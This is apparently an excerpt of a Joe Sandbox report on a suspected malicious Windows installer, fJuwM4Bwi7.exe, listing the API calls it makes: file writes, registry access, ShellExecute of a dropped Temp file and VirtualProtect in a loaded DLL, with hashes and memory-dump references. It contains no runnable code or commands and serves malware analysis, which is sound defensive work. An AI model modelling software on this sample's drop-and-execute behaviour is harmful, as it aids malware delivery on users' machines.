                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                          • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00403204
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 4115351271-1726532035
                                        • Opcode ID: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                        • Instruction ID: 89773af62672bbf6302d30782f314b1c1bc42d6855f09756152acd8bf908297a
                                        • Opcode Fuzzy Hash: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                        • Instruction Fuzzy Hash: 24D0C71290AD3066D5513B6A7C46FCF050C8F4675DF11807BF904751C58F6C555395EF
                                        APIs
                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                        • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID:
                                        • API String ID: 539440098-0
                                        • Opcode ID: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                        • Instruction ID: 3b6e370e410e3f669d4a968ba26e16673121f6254c39c59cd6eb20204b18cf3c
                                        • Opcode Fuzzy Hash: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                        • Instruction Fuzzy Hash: 14313931502259FFDF20DF55DD44A9E3BA8EF04395F20403AF908A61D0D2789A41EBA9
                                        APIs
                                          • Part of subcall function 0040603A: FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00406045
                                          • Part of subcall function 0040603A: FindClose.KERNEL32(00000000), ref: 00406051
                                        • lstrlenA.KERNEL32 ref: 004021CA
                                        • lstrlenA.KERNEL32(00000000), ref: 004021D4
                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
                                        • API String ID: 1486964399-0
                                        • Opcode ID: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                        • Instruction ID: 8bd3c95f8033a3e017dea1ba9a61a5da7054b4883ba983d73c0c7a27e6e6bfe8
                                        • Opcode Fuzzy Hash: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                        • Instruction Fuzzy Hash: 70115671E04319AADB00FFB5894999EB7F8EF10344F10853BA505FB2D2D6BCC9019B69
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Enum$CloseOpenValue
                                        • String ID:
                                        • API String ID: 167947723-0
                                        • Opcode ID: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                        • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                                        • Opcode Fuzzy Hash: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                        • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                                        APIs
                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,?), ref: 00401E1E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 00401E09
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 587946157-1144022150
                                        • Opcode ID: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
                                        • Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
                                        • Opcode Fuzzy Hash: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
                                        • Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000), ref: 100028AB
                                        • GetLastError.KERNEL32 ref: 100029B2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast
                                        • String ID:
                                        • API String ID: 1214770103-0
                                        • Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                        • Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
                                        • Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                                        • Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004023F8
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                        • Instruction ID: 6e7bf8a8071b86039a0630bdde8d6c62460c4efec4bb82e40fe4d514ce07d4c8
                                        • Opcode Fuzzy Hash: 7eb33a159c5e2e36f52cd260ea1f941ce228b1fcd6854e0b7c510fd00de33ed5
                                        • Instruction Fuzzy Hash: 6711C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE441B62C0D2B84A41EB6A
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                        • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                        • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                        • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID:
                                        • API String ID: 849931509-0
                                        • Opcode ID: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                        • Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
                                        • Opcode Fuzzy Hash: 9fe761724c1276d574af105ef08c00a5703bee9f5c9ace5d1d1e19f8a1f69dfd
                                        • Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E
                                        APIs
                                        • ShowWindow.USER32(00010454), ref: 00401579
                                        • ShowWindow.USER32(0001044E), ref: 0040158E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                        • Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
                                        • Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
                                        • Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                        • Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
                                        • Opcode Fuzzy Hash: 3f66373841930f62a7e084ead73e64351eb2d9defc74f476aa24081e3a98abe9
                                        • Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                        • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                        • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                        • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 004059BB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                        • Instruction ID: a98ca5448702c3e829ea1667e49b0be7f6aa4c87fef4348ac0342a167d80fd98
                                        • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                        • Instruction Fuzzy Hash: 19D0C9B2918120EBC2102728AD0889BBF69EB542717018B31F865A22B0C7304C52DAA9
                                        APIs
                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                        • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                        • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                        • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        APIs
                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A53
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        APIs
                                        • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000272D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID:
                                        • API String ID: 1096422788-0
                                        APIs
                                        • SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040404A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 004049B4
                                        • GetDlgItem.USER32(?,00000408), ref: 004049BF
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A09
                                        • LoadBitmapA.USER32(0000006E), ref: 00404A1C
                                        • SetWindowLongA.USER32(?,000000FC,00404F93), ref: 00404A35
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A49
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5B
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A71
